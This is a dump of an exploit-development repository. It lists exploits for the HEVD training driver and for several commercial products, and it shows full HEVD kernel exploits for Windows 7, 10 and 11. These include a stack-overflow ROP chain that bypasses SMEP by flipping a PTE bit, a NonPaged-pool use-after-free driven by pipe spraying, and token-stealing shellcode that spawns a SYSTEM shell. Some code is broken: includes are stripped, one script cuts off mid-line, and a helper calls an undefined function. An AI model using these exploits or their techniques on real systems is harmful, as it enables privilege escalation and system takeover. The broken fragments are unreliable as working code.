├── .github └── FUNDING.yml ├── HEVD-Exploits ├── 0x01 - Stack Overflow │ ├── Windows 10 (x64) │ │ ├── MiGetPteAddress.c │ │ ├── makefile │ │ ├── poc.c │ │ └── shellcode.asm │ ├── Windows 7 (x86) │ │ └── poc.py │ └── scripts │ │ ├── flip_bit.c │ │ └── get_cr4.c ├── 0x02 - Use After Free (NonpagedPool) │ ├── Windows 11 (x64) - NonPaged │ │ ├── makefile │ │ └── poc.c │ └── Windows 7 (x86) - NonPaged │ │ ├── makefile │ │ └── poc.c ├── 0x03 - Arbitrary Write (Write-What-Where) │ ├── Windows 11 (x64) │ │ ├── makefile │ │ └── poc.c │ └── Windows 7 (x86) │ │ ├── makefile │ │ └── poc.c ├── 0x04 - Type Confusion │ ├── Windows 11 (x64) │ │ ├── makefile │ │ └── poc.c │ └── Windows 7 (x86) │ │ ├── makefile │ │ ├── poc.c │ │ └── struct_size.c ├── 0x05 - Race Condition (Double Fetch) │ ├── Windows 11 (x64) │ │ ├── makefile │ │ └── poc.c │ └── Windows 7 (x86) │ │ ├── makefile │ │ └── poc.c └── 0x06 - Stack Overflow (GS) │ └── Windows 11 (x64) │ ├── makefile │ └── poc.c ├── LICENSE.md ├── Metasploit-Modules ├── erlang_cookie_rce.rb ├── pfsense_graph_injection_exec.rb └── syncbreeze_bof.rb ├── Personal-Exploits ├── DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE │ ├── README.md │ ├── images │ │ ├── admin-side.png │ │ ├── bruteforce.png │ │ ├── fssh.png │ │ ├── ftp-settings.png │ │ └── logged-in-shell.png │ ├── isilon-onefs-brute.py │ └── isilon-onefs-ftp-exploit.py ├── Nimsoft nimcontroller 7.80 - Unauthenticated RCE │ └── poc_release.c ├── README.md ├── SyncBreeze Enterprise v10.1.16 - Unauthenticated RCE │ ├── README.md │ ├── images │ │ └── w00t.png │ └── sploit-PoC.py ├── Sysdig Monitor - Kubernetes Post Exploitation │ ├── README.md │ └── sysdig_extract.py └── VXSearch v10.2.14 - Local Code Execution │ ├── README.md │ ├── images │ └── Proof.png │ └── vxSearchSploitWin7.py ├── Ported-Exploits ├── CVE-2003-0727.py ├── CVE-2006-6184.py ├── CVE-2017-18047.py ├── CVE-2019-1003000_CVE-2018-1999002_exploit_chain.py ├── allok-exploit.py ├── mysql_UDF_pwnage.py └── webdav_exploit.py └── README.md /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: [wetw0rk] 2 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/Windows 10 (x64)/MiGetPteAddress.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | 6 | int64_t MiGetPteAddress(int64_t rcx) 7 | { 8 | int64_t rax = 0x00; 9 | 10 | rcx = rcx >> 9; 11 | rax = 0x7FFFFFFFF8; 12 | rcx = rcx & rax; 13 | rax = 0x0FFFFF08000000000; 14 | rax = rax + rcx; 15 | return rax; 16 | } 17 | 18 | int main() { 19 | printf("PTE Located @{ 0x%llx }\n", MiGetPteAddress(0x00000220c16d0000)); 20 | } 21 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/Windows 10 (x64)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/Windows 10 (x64)/poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | // I/O Request Packets (IRPs) 9 | #define TRIGGER_BUFFER_OVERFLOW_STACK 0x222003 10 | 11 | #define BUFFER_SIZE 4242 12 | 13 | uint64_t GetKernelBaseAddress() 14 | { 15 | ULONG_PTR pKernelBaseAddress = 0; 16 | LPVOID *lpImageBase = NULL; 17 | DWORD dwBytesNeeded = 0; 18 | 19 | if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) { 20 | printf("[-] Failed to calculate bytes needed for device driver entries"); 21 | return -1; 22 | } 23 | 24 | if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) { 25 | printf("[-] Failed to allocate heap for lpImageBase\n"); 26 | if (lpImageBase) { 27 | HeapFree(GetProcessHeap(), 0, lpImageBase); 28 | } 29 | return -1; 30 | } 31 | 32 | if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) { 33 | printf("[-] EnumDeviceDrivers: %d", GetLastError()); 34 | if (lpImageBase) { 35 | HeapFree(GetProcessHeap(), 0, lpImageBase); 36 | } 37 | return -1; 38 | } 39 | 40 | pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0]; 41 | HeapFree(GetProcessHeap(), 0, lpImageBase); 42 | 43 | printf("[*] Kernel Base Address: %llx\n", pKernelBaseAddress); 44 | 45 | return pKernelBaseAddress; 46 | } 47 | 48 | void GenerateBuffer(int64_t *buffer, int64_t kernel_base, LPVOID shellcode) 49 | { 50 | int64_t i = 259; 51 | int64_t j = 0; 52 | 53 | printf("[*] Generating buffer to bypass VPS and disable SMEP\n"); 54 | 55 | /* Prepare RDX register for later. This is needed for the XOR operation */ 56 | buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt] 57 | buffer[i++] = 0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR 58 | buffer[i++] = 0x000000; // [filler] 59 | buffer[i++] = 0x000000; // [filler] 60 | 61 | /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our 62 | userland code. The setup is as follows: 63 | 64 | RAX -> VOID *MiGetPteAddress( 65 | ( RCX == PTE / Userland Code ) 66 | ); 67 | 68 | Once the call is complete RAX should contain the pointer to our PTE. */ 69 | buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret [nt] 70 | buffer[i++] = (int64_t)shellcode; // *shellcode [nt] 71 | buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress() [nt] 72 | 73 | /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to 74 | mark the page as a kernel page (U -> K). We can do this using XOR ;) */ 75 | buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret [nt] 76 | buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret [nt] 77 | buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt] 78 | buffer[i++] = 0x000004; // When we XOR the PTE by 0x4 we flip the 2nd bit (U -> K) 79 | buffer[i++] = 0x000000; // [filler] 80 | buffer[i++] = 0x000000; // [filler] 81 | buffer[i++] = kernel_base + 0x2107b2; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt] 82 | 83 | /* Now we can spray our shellcode address since SMEP and VPS should be bypassed */ 84 | for (j = 0; j < 0xC; j++) { 85 | buffer[i++] = (int64_t)shellcode; 86 | } 87 | 88 | printf("[*] Calling shellcode: 0x%p\n", shellcode); 89 | } 90 | 91 | int main() 92 | { 93 | HANDLE hHEVD = NULL; 94 | DWORD bytesReturned = 0; 95 | int64_t buffer[BUFFER_SIZE] = {0}; 96 | int64_t kernelBaseAddr = 0; 97 | LPVOID lpMemory = NULL; 98 | 99 | char shellcode[] = 100 | // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint 101 | "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188] 102 | "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, qword ptr [rax + 0xb8] 103 | "\x48\x89\xc1" // mov rcx, rax 104 | "\xb2\x04" // mov dl, 4 105 | "\x48\x8b\x80\x48\x04\x00\x00" // mov rax, qword ptr [rax + 0x448] 106 | "\x48\x2d\x48\x04\x00\x00" // sub rax, 0x448 107 | "\x38\x90\x40\x04\x00\x00" // cmp byte ptr [rax + 0x440], dl 108 | "\x75\xeb" // jne 0x1017 109 | "\x48\x8b\x90\xb8\x04\x00\x00" // mov rdx, qword ptr [rax + 0x4b8] 110 | "\x48\x89\x91\xb8\x04\x00\x00" // mov qword ptr [rcx + 0x4b8], rdx 111 | 112 | // python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint 113 | "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188] 114 | "\x66\x8b\x88\xe4\x01\x00\x00" // mov cx, word ptr [rax + 0x1e4] 115 | "\x66\xff\xc1" // inc cx 116 | "\x66\x89\x88\xe4\x01\x00\x00" // mov word ptr [rax + 0x1e4], cx 117 | "\x48\x8b\x90\x90\x00\x00\x00" // mov rdx, qword ptr [rax + 0x90] 118 | "\x48\x8b\x8a\x68\x01\x00\x00" // mov rcx, qword ptr [rdx + 0x168] 119 | "\x4c\x8b\x9a\x78\x01\x00\x00" // mov r11, qword ptr [rdx + 0x178] 120 | "\x48\x8b\xa2\x80\x01\x00\x00" // mov rsp, qword ptr [rdx + 0x180] 121 | "\x48\x8b\xaa\x58\x01\x00\x00" // mov rbp, qword ptr [rdx + 0x158] 122 | "\x31\xc0" // xor eax, eax 123 | "\x0f\x01\xf8" // swapgs 124 | "\x48\x0f\x07"; // sysretq 125 | 126 | 127 | int shellcodeLength = (58 + 71); 128 | 129 | kernelBaseAddr = GetKernelBaseAddress(); 130 | 131 | printf("[*] Getting a handle on HEVD\n"); 132 | 133 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 134 | (GENERIC_READ | GENERIC_WRITE), 135 | 0x00, 136 | NULL, 137 | OPEN_EXISTING, 138 | FILE_ATTRIBUTE_NORMAL, 139 | NULL); 140 | 141 | if (hHEVD == INVALID_HANDLE_VALUE) 142 | { 143 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 144 | return -1; 145 | } 146 | 147 | printf("[*] Allocating RWX memory\n"); 148 | lpMemory = VirtualAlloc(NULL, 149 | shellcodeLength, 150 | (MEM_COMMIT | MEM_RESERVE), 151 | PAGE_EXECUTE_READWRITE); 152 | 153 | printf("[*] Copying shellcode into RWX memory\n"); 154 | memcpy(lpMemory, shellcode, shellcodeLength); 155 | 156 | printf("[*] Spraying return address: 0x%p\n", lpMemory); 157 | GenerateBuffer(buffer, kernelBaseAddr, lpMemory); 158 | 159 | printf("[*] Triggering control code 0x222003\n"); 160 | DeviceIoControl(hHEVD, 161 | TRIGGER_BUFFER_OVERFLOW_STACK, 162 | buffer, 163 | BUFFER_SIZE, 164 | NULL, 165 | 0x00, 166 | &bytesReturned, 167 | NULL); 168 | 169 | system("C:\\Windows\\System32\\cmd.exe"); 170 | } 171 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/Windows 10 (x64)/shellcode.asm: -------------------------------------------------------------------------------- 1 | [bits 64 ] 2 | [section .text] 3 | 4 | global _start 5 | 6 | _start: 7 | xor rax,rax 8 | mov rax, qword gs:[0x188] ; Obtain the current thread ( nt!_KPCR.PcrbData.CurrentThread ) 9 | mov rax, [rax + 0xb8] ; Obtain the current process ( nt!_KTHREAD.ApcState.Process ) 10 | mov rcx, rax ; Copy the current process _KPROCESS into rcx 11 | mov rdx, 0x04 ; WIN 10 SYSTEM PROCESS PID 12 | 13 | SearchSystemPID: 14 | mov rax, [rax + 0x448] ; ( nt!_EPROCESS.ActiveProcessLinks.Flink ) 15 | sub rax, 0x448 16 | cmp [rax + 0x440], rdx ; ( nt!_EPROCESS.UniqueProcessId ) 17 | jne SearchSystemPID 18 | 19 | mov rdx, [rax + 0x4b8] ; Get SYSTEM process ( nt!_EPROCESS.Token ) 20 | mov [rcx + 0x4b8], rdx ; Replace target process token ( nt!_EPROCESS.Token ) 21 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/Windows 7 (x86)/poc.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import os 3 | from ctypes import * 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x00000003 8 | FILE_ATTRIBUTE_NORMAL = 0x00000080 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | 13 | NULL = None 14 | 15 | def main(): 16 | 17 | kernel32 = windll.kernel32 18 | hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver", 19 | (GENERIC_READ | GENERIC_WRITE), 20 | 0x00, 21 | NULL, 22 | OPEN_EXISTING, 23 | FILE_ATTRIBUTE_NORMAL, 24 | NULL) 25 | if (hHEVD == -1): 26 | print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n") 27 | exit(-1) 28 | 29 | shellcode = bytearray() 30 | 31 | # python3 sickle.py -a x86 -v shellcode -p windows/x86/kernel_token_stealer -f python3 -m pinpoint 32 | shellcode += b'\x60' # pushal 33 | shellcode += b'\x31\xc0' # xor eax, eax 34 | shellcode += b'\x64\x8b\x80\x24\x01\x00\x00' # mov eax, dword ptr fs:[eax + 0x124] 35 | shellcode += b'\x8b\x40\x50' # mov eax, dword ptr [eax + 0x50] 36 | shellcode += b'\x89\xc1' # mov ecx, eax 37 | shellcode += b'\xba\x04\x00\x00\x00' # mov edx, 4 38 | shellcode += b'\x8b\x80\xb8\x00\x00\x00' # mov eax, dword ptr [eax + 0xb8] 39 | shellcode += b'\x2d\xb8\x00\x00\x00' # sub eax, 0xb8 40 | shellcode += b'\x39\x90\xb4\x00\x00\x00' # cmp dword ptr [eax + 0xb4], edx 41 | shellcode += b'\x75\xed' # jne 0x1014 42 | shellcode += b'\x8b\x90\xf8\x00\x00\x00' # mov edx, dword ptr [eax + 0xf8] 43 | shellcode += b'\x89\x91\xf8\x00\x00\x00' # mov dword ptr [ecx + 0xf8], edx 44 | shellcode += b'\x61' # popal 45 | 46 | shellcode += b'\x5D' # pop ebp 47 | shellcode += b'\xC2\x08\x00' # ret 0x8 48 | 49 | print("[*] Allocating RWX memory") 50 | ptrMemory = kernel32.VirtualAlloc(NULL, 51 | len(shellcode), 52 | (MEM_COMMIT | MEM_RESERVE), 53 | PAGE_EXECUTE_READWRITE) 54 | 55 | print("[*] Creating a char array to house shellcode") 56 | buffer = (c_char * len(shellcode)).from_buffer(shellcode) 57 | 58 | print("[*] Copying shellcode array into RWX memory") 59 | kernel32.RtlMoveMemory(c_int(ptrMemory), buffer, len(shellcode)) 60 | 61 | ptrShellcode = struct.pack(" 6 | #include 7 | #include 8 | 9 | // https://stackoverflow.com/questions/111928/is-there-a-printf-converter-to-print-in-binary-format 10 | #define PRINTF_BINARY_PATTERN_INT8 "%c%c%c%c%c%c%c%c " 11 | #define PRINTF_BYTE_TO_BINARY_INT8(i) \ 12 | (((i) & 0x80ll) ? '1' : '0'), \ 13 | (((i) & 0x40ll) ? '1' : '0'), \ 14 | (((i) & 0x20ll) ? '1' : '0'), \ 15 | (((i) & 0x10ll) ? '1' : '0'), \ 16 | (((i) & 0x08ll) ? '1' : '0'), \ 17 | (((i) & 0x04ll) ? '1' : '0'), \ 18 | (((i) & 0x02ll) ? '1' : '0'), \ 19 | (((i) & 0x01ll) ? '1' : '0') 20 | 21 | #define PRINTF_BINARY_PATTERN_INT16 \ 22 | PRINTF_BINARY_PATTERN_INT8 PRINTF_BINARY_PATTERN_INT8 23 | #define PRINTF_BYTE_TO_BINARY_INT16(i) \ 24 | PRINTF_BYTE_TO_BINARY_INT8((i) >> 8), PRINTF_BYTE_TO_BINARY_INT8(i) 25 | #define PRINTF_BINARY_PATTERN_INT32 \ 26 | PRINTF_BINARY_PATTERN_INT16 PRINTF_BINARY_PATTERN_INT16 27 | #define PRINTF_BYTE_TO_BINARY_INT32(i) \ 28 | PRINTF_BYTE_TO_BINARY_INT16((i) >> 16), PRINTF_BYTE_TO_BINARY_INT16(i) 29 | #define PRINTF_BINARY_PATTERN_INT64 \ 30 | PRINTF_BINARY_PATTERN_INT32 PRINTF_BINARY_PATTERN_INT32 31 | #define PRINTF_BYTE_TO_BINARY_INT64(i) \ 32 | PRINTF_BYTE_TO_BINARY_INT32((i) >> 32), PRINTF_BYTE_TO_BINARY_INT32(i) 33 | 34 | uint64_t flip_bit(uint64_t num, unsigned int bit_position) 35 | { 36 | return (num ^ (1ULL << bit_position)); 37 | } 38 | 39 | int main(int argc, char *argv[]) 40 | { 41 | unsigned int bit = 0; 42 | uint64_t num = 0; 43 | 44 | if (argc < 2) { 45 | printf("Usage: %s
\n", argv[0]); 46 | return -1; 47 | } 48 | 49 | num = strtoll(argv[1], NULL, 0); 50 | bit = atoi(argv[2]); 51 | 52 | printf("OLD:\n\n\t"); 53 | printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num)); 54 | putchar('\n'); 55 | 56 | num = clear_bit(num, bit); 57 | 58 | printf("NEW\n\n\t"); 59 | printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num)); 60 | putchar('\n'); 61 | 62 | printf("\nResult: %016llx\n", num); 63 | } 64 | 65 | 66 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x01 - Stack Overflow/scripts/get_cr4.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | // https://stackoverflow.com/questions/111928/is-there-a-printf-converter-to-print-in-binary-format 8 | #define PRINTF_BINARY_PATTERN_INT8 "%c%c%c%c%c%c%c%c " 9 | #define PRINTF_BYTE_TO_BINARY_INT8(i) \ 10 | (((i) & 0x80ll) ? '1' : '0'), \ 11 | (((i) & 0x40ll) ? '1' : '0'), \ 12 | (((i) & 0x20ll) ? '1' : '0'), \ 13 | (((i) & 0x10ll) ? '1' : '0'), \ 14 | (((i) & 0x08ll) ? '1' : '0'), \ 15 | (((i) & 0x04ll) ? '1' : '0'), \ 16 | (((i) & 0x02ll) ? '1' : '0'), \ 17 | (((i) & 0x01ll) ? '1' : '0') 18 | 19 | #define PRINTF_BINARY_PATTERN_INT16 \ 20 | PRINTF_BINARY_PATTERN_INT8 PRINTF_BINARY_PATTERN_INT8 21 | #define PRINTF_BYTE_TO_BINARY_INT16(i) \ 22 | PRINTF_BYTE_TO_BINARY_INT8((i) >> 8), PRINTF_BYTE_TO_BINARY_INT8(i) 23 | #define PRINTF_BINARY_PATTERN_INT32 \ 24 | PRINTF_BINARY_PATTERN_INT16 PRINTF_BINARY_PATTERN_INT16 25 | #define PRINTF_BYTE_TO_BINARY_INT32(i) \ 26 | PRINTF_BYTE_TO_BINARY_INT16((i) >> 16), PRINTF_BYTE_TO_BINARY_INT16(i) 27 | #define PRINTF_BINARY_PATTERN_INT64 \ 28 | PRINTF_BINARY_PATTERN_INT32 PRINTF_BINARY_PATTERN_INT32 29 | #define PRINTF_BYTE_TO_BINARY_INT64(i) \ 30 | PRINTF_BYTE_TO_BINARY_INT32((i) >> 32), PRINTF_BYTE_TO_BINARY_INT32(i) 31 | 32 | /* 33 | * flip_bit: simple function to flip a bit, for CR4 this would be 20 34 | */ 35 | uint64_t flip_bit(uint64_t cr4, unsigned int bit_position) 36 | { 37 | unsigned int mask = 1 << (bit_position - 1); 38 | return (cr4 ^ mask); 39 | } 40 | 41 | int main(int argc, char *argv[]) 42 | { 43 | uint64_t num = 0; 44 | 45 | if (argc < 2) { 46 | printf("Usage: %s \n", argv[0]); 47 | return -1; 48 | } 49 | 50 | num = strtoll(argv[1], NULL, 0); 51 | 52 | printf("OLD CR4:\n\n\t"); 53 | printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num)); 54 | putchar('\n'); 55 | 56 | num = flip_bit(num, 20); 57 | 58 | printf("NEW CR4\n\n\t"); 59 | printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num)); 60 | putchar('\n'); 61 | 62 | printf("\nResult: 0x%lx\n", num); 63 | } 64 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x02 - Use After Free (NonpagedPool)/Windows 11 (x64) - NonPaged/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x02 - Use After Free (NonpagedPool)/Windows 11 (x64) - NonPaged/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | 10 | // IOCTL Codes 11 | #define ALLOCATE_REAL_OBJ 0x222013 12 | #define CALL_FUNC_PTR 0x222017 13 | #define FREE_OBJ 0x22201b 14 | #define ALLOCATE_FAKE_OBJ 0x22201f 15 | 16 | // DATA_ENTRY Allocations 17 | #define DEF_PIPES 20000 18 | #define SEQ_PIPES 60000 19 | 20 | /* CreatePipeObject(): 21 | This function creates a pipe and returns the handles to the read and write ends of said pipe. However, 22 | what this does in the case of our exploit is create an allocation in the NonPaged pool. It's important 23 | to note each allocation is made by the Named Pipe File System (NPFS.sys). That said it will prepend an 24 | allocation with a DATA_ENTRY structure (or NP_DATA_QUEUE_ENTRY), on an x86_64 system this structure is 25 | 0x48 bytes. So each allocation must be greater than 0x48 bytes. Equation below: 26 | 27 | CreatePipe(HANDLE hR, HANDLE hW, NULL, nSize); 28 | NonPagedAllocation = nSize + sizeof(_NP_DATA_QUEUE_ENTRY) 29 | 30 | So in our case we're allocating 0x60 bytes in the NonPaged pool. This code was taken from VulnDevs 31 | blog located here: 32 | 33 | https://vulndev.io/2022/07/14/windows-kernel-exploitation-hevd-x64-use-after-free/ 34 | 35 | The only difference is this was written in C vs C++ */ 36 | typedef struct PipeHandles { 37 | HANDLE read; 38 | HANDLE write; 39 | } PipeHandles; 40 | 41 | struct PipeHandles CreatePipeObject() { 42 | BYTE uBuffer[0x18] = { 0 }; 43 | HANDLE readPipe = NULL; 44 | HANDLE writePipe = NULL; 45 | DWORD resultLength = 0; 46 | 47 | RtlFillMemory(uBuffer, 0x18, 0x41); 48 | if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) { 49 | printf("[-] CreatePipe\n"); 50 | } 51 | 52 | if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) { 53 | printf("[-] WriteFile\n"); 54 | } 55 | 56 | return (struct PipeHandles) {.read = readPipe, .write = writePipe}; 57 | } 58 | 59 | /* SendIOCTL(): 60 | Send the IOCTL code to the driver */ 61 | void SendIOCTL(HANDLE hHEVD, DWORD dIoctl, CHAR *pBuffer, DWORD dBuffer) 62 | { 63 | DWORD bytesReturned = 0; 64 | 65 | DeviceIoControl(hHEVD, 66 | dIoctl, 67 | pBuffer, 68 | dBuffer, 69 | NULL, 70 | 0x00, 71 | &bytesReturned, 72 | NULL); 73 | 74 | return; 75 | } 76 | 77 | /* GetKernelBaseAddress(): 78 | Using EnumDeviceDrivers() obtain the base address of ntoskrnl.exe */ 79 | uint64_t GetKernelBaseAddress() 80 | { 81 | ULONG_PTR pKernelBaseAddress = 0; 82 | LPVOID *lpImageBase = NULL; 83 | DWORD dwBytesNeeded = 0; 84 | 85 | if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) { 86 | printf("[-] Failed to calculate bytes needed for device driver entries"); 87 | return -1; 88 | } 89 | 90 | if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) { 91 | printf("[-] Failed to allocate heap for lpImageBase\n"); 92 | if (lpImageBase) { 93 | HeapFree(GetProcessHeap(), 0, lpImageBase); 94 | } 95 | return -1; 96 | } 97 | 98 | if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) { 99 | printf("[-] EnumDeviceDrivers: %d", GetLastError()); 100 | if (lpImageBase) { 101 | HeapFree(GetProcessHeap(), 0, lpImageBase); 102 | } 103 | return -1; 104 | } 105 | 106 | pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0]; 107 | HeapFree(GetProcessHeap(), 0, lpImageBase); 108 | 109 | printf("[*] Kernel Base Address: %llx\n", pKernelBaseAddress); 110 | 111 | return pKernelBaseAddress; 112 | } 113 | 114 | /* CheckWin(): 115 | Simple function to check if we're running as SYSTEM */ 116 | int CheckWin(VOID) 117 | { 118 | DWORD win = 0; 119 | DWORD dwLen = 0; 120 | CHAR *cUsername = NULL; 121 | 122 | GetUserNameA(NULL, &dwLen); 123 | 124 | if (dwLen > 0) { 125 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 126 | } else { 127 | printf("[-] Failed to allocate buffer for username check\n"); 128 | return -1; 129 | } 130 | 131 | GetUserNameA(cUsername, &dwLen); 132 | 133 | win = strcmp(cUsername, "SYSTEM"); 134 | free(cUsername); 135 | 136 | return (win == 0) ? win : -1; 137 | } 138 | 139 | /* Exploit(): 140 | NonPaged Pool UAF */ 141 | int Exploit(HANDLE hHEVD) 142 | { 143 | PipeHandles defragPipeHandles[DEF_PIPES] = {0}; 144 | PipeHandles seqPipeHandles[SEQ_PIPES] = {0}; 145 | int i = 0; 146 | int64_t kernelBaseAddr = GetKernelBaseAddress(); 147 | 148 | char cShellcode[0x58] = 149 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90" // FUNCTION POINTER 150 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLED 151 | 152 | // sickle -p windows/x64/kernel_token_stealer -f c -m pinpoint 153 | "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188] 154 | "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, qword ptr [rax + 0xb8] 155 | "\x48\x89\xc1" // mov rcx, rax 156 | "\xb2\x04" // mov dl, 4 157 | "\x48\x8b\x80\x48\x04\x00\x00" // mov rax, qword ptr [rax + 0x448] 158 | "\x48\x2d\x48\x04\x00\x00" // sub rax, 0x448 159 | "\x38\x90\x40\x04\x00\x00" // cmp byte ptr [rax + 0x440], dl 160 | "\x75\xeb" // jne 0x1017 161 | "\x48\x8b\x90\xb8\x04\x00\x00" // mov rdx, qword ptr [rax + 0x4b8] 162 | "\x48\x89\x91\xb8\x04\x00\x00" // mov qword ptr [rcx + 0x4b8], rdx 163 | 164 | // KERNEL RECOVERY 165 | "\x48\x31\xc0" // xor rax, rax 166 | "\x48\x83\xc4\x48" // add rsp, 0x48 167 | "\xc3"; // ret 168 | 169 | /* I found this intresting, we must allocate DATA_ENTRY objects like so otherwise 170 | we will fail to allocate any. We have to start with a low amount THEN allocate 171 | the sequential DATA_ENTRY objects. Although this is just 80000 allocations, we 172 | CANNOT just use one loop to hold all 80000 allocations. We must space it out */ 173 | printf("[*] Spraying objects for pool defragmentation\n"); 174 | for (i = 0; i < DEF_PIPES; i++) 175 | defragPipeHandles[i] = CreatePipeObject(); 176 | for (i = 0; i < SEQ_PIPES; i++) 177 | seqPipeHandles[i] = CreatePipeObject(); 178 | 179 | printf("[*] Creating holes to store object\n"); 180 | for (i = 0; i < SEQ_PIPES; i++) { 181 | if (i % 2 == 0) { 182 | CloseHandle(seqPipeHandles[i].read); 183 | CloseHandle(seqPipeHandles[i].write); 184 | } 185 | } 186 | 187 | printf("[*] Allocating target structure\n"); 188 | SendIOCTL(hHEVD, ALLOCATE_REAL_OBJ, NULL, 0); 189 | 190 | printf("[*] Freeing target structure\n"); 191 | SendIOCTL(hHEVD, FREE_OBJ, NULL, 0); 192 | 193 | printf("[*] Filling holes with custom objects\n"); 194 | *(uint64_t *)(cShellcode) = (uint64_t)(kernelBaseAddr + 0x40176b); /* add al, 0x10 ; call rax [nt] */ 195 | for (int i = 0; i < 30000; i++) 196 | SendIOCTL(hHEVD, ALLOCATE_FAKE_OBJ, cShellcode, 0x58); 197 | 198 | printf("[*] Triggering UAF\n"); 199 | SendIOCTL(hHEVD, CALL_FUNC_PTR, NULL, 0); 200 | 201 | return CheckWin(); 202 | } 203 | 204 | int main() 205 | { 206 | HANDLE hHEVD = NULL; 207 | 208 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 209 | (GENERIC_READ | GENERIC_WRITE), 210 | 0x00, 211 | NULL, 212 | OPEN_EXISTING, 213 | FILE_ATTRIBUTE_NORMAL, 214 | NULL); 215 | 216 | if (hHEVD == INVALID_HANDLE_VALUE) 217 | { 218 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 219 | return -1; 220 | } 221 | 222 | if (Exploit(hHEVD) == 0) { 223 | printf("[*] Exploitation successful, enjoy your shell\n\n"); 224 | system("cmd.exe"); 225 | } else { 226 | printf("[-] Exploitation failed, run again\n"); 227 | return -1; 228 | } 229 | 230 | return 0; 231 | } 232 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x02 - Use After Free (NonpagedPool)/Windows 7 (x86) - NonPaged/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | i686-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x02 - Use After Free (NonpagedPool)/Windows 7 (x86) - NonPaged/poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | #define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS) 9 | 10 | #define HEVD_ALLOCATE_ROBJ IOCTL(0x804) 11 | #define HEVD_CALL_FPTR IOCTL(0x805) 12 | #define HEVD_FREE IOCTL(0x806) 13 | #define HEVD_ALLOCATE_FOBJ 